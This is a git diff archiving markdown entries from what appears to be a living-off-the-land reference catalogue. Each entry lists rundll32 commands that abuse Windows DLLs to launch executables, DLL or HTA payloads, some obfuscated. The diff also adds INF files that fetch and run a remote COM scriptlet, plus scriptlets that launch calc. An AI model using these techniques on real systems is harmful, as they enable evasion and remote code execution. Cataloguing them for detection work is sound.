Removed MD files, we only use the webportal from now on. All MD files moved to archive

Archive-Old-Version/OSLibraries/Advpack.dll.md

@@ -0,0 +1,32 @@
+## Advpack.dll
+* Functions: Execute
+```
+
+rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
+Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
+
+rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
+Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
+
+rundll32.exe Advpack.dll,RegisterOCX calc.exe
+Launch executable by calling the RegisterOCX function.
+
+rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
+Launch executable by calling the RegisterOCX function.
+
+rundll32.exe Advpack.dll,RegisterOCX test.dll
+Launch a DLL payload by calling the RegisterOCX function.
+```
+   
+* Resources:   
+  * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
+  * https://twitter.com/ItsReallyNick/status/967859147977850880
+  * https://twitter.com/bohops/status/974497123101179904
+  * https://twitter.com/moriarty_meng/status/977848311603380224
+   
+* Full path:   
+  * c:\windows\system32\advpack.dll
+  * c:\windows\sysWOW64\advpack.dll
+   
+* Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)  
+   

Archive-Old-Version/OSLibraries/Ieadvpack.dll.md

@@ -0,0 +1,28 @@
+## Ieadvpack.dll
+* Functions: Execute
+```
+
+rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
+Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
+
+rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1,
+Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
+
+rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe
+Launch executable by calling the RegisterOCX function.
+
+rundll32.exe IEAdvpack.dll,RegisterOCX test.dll
+Launch a DLL payload by calling the RegisterOCX function.
+```
+   
+* Resources:   
+  * https://twitter.com/pabraeken/status/991695411902599168
+  * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
+  * https://twitter.com/0rbz_/status/974472392012689408
+   
+* Full path:   
+  * c:\windows\system32\ieadvpack.dll
+  * c:\windows\sysWOW64\ieadvpack.dll
+   
+* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)  
+   

Archive-Old-Version/OSLibraries/Ieframe.dll.md

@@ -0,0 +1,22 @@
+## Ieframe.dll
+* Functions: Execute
+```
+
+rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
+Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+
+rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
+Renamed URL file.
+```
+   
+* Resources:   
+  * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
+  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+  * https://twitter.com/bohops/status/997690405092290561
+   
+* Full path:   
+  * c:\windows\system32\Ieframe.dll
+  * c:\windows\sysWOW64\Ieframe.dll
+   
+* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops  
+   

Archive-Old-Version/OSLibraries/Mshtml.dll.md

@@ -0,0 +1,17 @@
+## Mshtml.dll
+* Functions: Execute
+```
+
+rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
+Invoke an HTML Application. Note - Pops a security warning and a print dialogue box.
+```
+   
+* Resources:   
+  * https://twitter.com/pabraeken/status/998567549670477824
+   
+* Full path:   
+  * c:\windows\system32\Mshtml.dll
+  * c:\windows\sysWOW64\Mshtml.dll
+   
+* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
+   

Archive-Old-Version/OSLibraries/Payload/Advpack.inf

@@ -0,0 +1,14 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"

Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct

@@ -0,0 +1,44 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee --> 
+        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>

Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf

@@ -0,0 +1,14 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"

Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct

@@ -0,0 +1,44 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee --> 
+        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>

Archive-Old-Version/OSLibraries/Pcwutl.dll.md

@@ -0,0 +1,17 @@
+## Pcwutl.dll
+* Functions: Execute
+```
+
+rundll32.exe pcwutl.dll,LaunchApplication calc.exe
+Launch executable by calling the LaunchApplication function.
+```
+   
+* Resources:   
+  * https://twitter.com/harr0ey/status/989617817849876488
+   
+* Full path:   
+  * c:\windows\system32\Pcwutl.dll
+  * c:\windows\sysWOW64\Pcwutl.dll
+   
+* Notes: Thanks to Matt harr0ey - @harr0ey  
+   

Archive-Old-Version/OSLibraries/Setupapi.dll.md

@@ -0,0 +1,23 @@
+## Setupapi.dll
+* Functions: Execute
+```
+
+rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
+Launch an executable file via the InstallHinfSection function and .inf file section directive.
+
+rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
+Remote fetch and execute a COM Scriptlet by calling an information file directive.
+```
+   
+* Resources:   
+  * https://twitter.com/pabraeken/status/994742106852941825
+  * https://twitter.com/subTee/status/951115319040356352
+  * https://twitter.com/KyleHanslovan/status/911997635455852544
+  * https://github.com/huntresslabs/evading-autoruns
+   
+* Full path:   
+  * c:\windows\system32\Setupapi.dll
+  * c:\windows\sysWOW64\Setupapi.dll
+   
+* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)  
+   

Archive-Old-Version/OSLibraries/Shdocvw.dll.md

@@ -0,0 +1,22 @@
+## Shdocvw.dll
+* Functions: Execute
+```
+
+rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
+Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+
+rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
+Renamed URL file.
+```
+   
+* Resources:   
+  * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
+  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+  * https://twitter.com/bohops/status/997690405092290561
+   
+* Full path:   
+  * c:\windows\system32\Shdocvw.dll
+  * c:\windows\sysWOW64\Shdocvw.dll
+   
+* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops  
+   

Archive-Old-Version/OSLibraries/Shell32.dll.md

@@ -0,0 +1,26 @@
+## Shell32.dll
+* Functions: Execute
+```
+
+rundll32.exe shell32.dll,Control_RunDLL payload.dll
+Launch DLL payload.
+
+rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
+Launch executable payload.
+
+rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
+Launch executable payload with arguments.
+```
+   
+* Resources:   
+  * https://twitter.com/Hexacorn/status/885258886428725250
+  * https://twitter.com/pabraeken/status/991768766898941953
+  * https://twitter.com/mattifestation/status/776574940128485376
+  * https://twitter.com/KyleHanslovan/status/905189665120149506
+   
+* Full path:   
+  * c:\windows\system32\shell32.dll
+  * c:\windows\sysWOW64\shell32.dll
+   
+* Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)  
+   

Archive-Old-Version/OSLibraries/Syssetup.dll.md

@@ -0,0 +1,22 @@
+## Syssetup.dll
+* Functions: Execute
+```
+
+rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
+Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
+
+rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf
+Remote fetch and execute a COM Scriptlet by calling an information file directive.
+```
+   
+* Resources:   
+  * https://twitter.com/pabraeken/status/994392481927258113
+  * https://twitter.com/harr0ey/status/975350238184697857
+  * https://twitter.com/bohops/status/975549525938135040
+   
+* Full path:   
+  * c:\windows\system32\Syssetup.dll
+  * c:\windows\sysWOW64\Syssetup.dll
+   
+* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)  
+   

Archive-Old-Version/OSLibraries/Url.dll.md

@@ -0,0 +1,36 @@
+## Url.dll
+* Functions: Execute
+```
+
+rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
+Launch a HTML application payload by calling OpenURL.
+
+rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
+Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
+
+rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+Launch an executable payload by calling OpenURL.
+
+rundll32.exe url.dll,FileProtocolHandler calc.exe
+Launch an executable payload by calling FileProtocolHandler.
+
+rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
+Launch a HTML application payload by calling FileProtocolHandler.
+
+rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+Launch an executable payload by calling FileProtocolHandler.
+```
+   
+* Resources:   
+  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
+  * https://twitter.com/bohops/status/974043815655956481
+  * https://twitter.com/DissectMalware/status/995348436353470465
+  * https://twitter.com/yeyint_mth/status/997355558070927360
+  * https://twitter.com/Hexacorn/status/974063407321223168
+   
+* Full path:   
+  * c:\windows\system32\url.dll
+  * c:\windows\sysWOW64\url.dll
+   
+* Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)  
+   

Archive-Old-Version/OSLibraries/Zipfldr.dll.md

@@ -0,0 +1,21 @@
+## Zipfldr.dll
+* Functions: Execute
+```
+
+rundll32.exe zipfldr.dll,RouteTheCall calc.exe
+Launch an executable payload by calling RouteTheCall.
+
+rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
+Launch an executable payload by calling RouteTheCall.
+```
+   
+* Resources:   
+  * https://twitter.com/moriarty_meng/status/977848311603380224
+  * https://twitter.com/bohops/status/997896811904929792
+   
+* Full path:   
+  * c:\windows\system32\zipfldr.dll
+  * c:\windows\sysWOW64\zipfldr.dll
+   
+* Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)  
+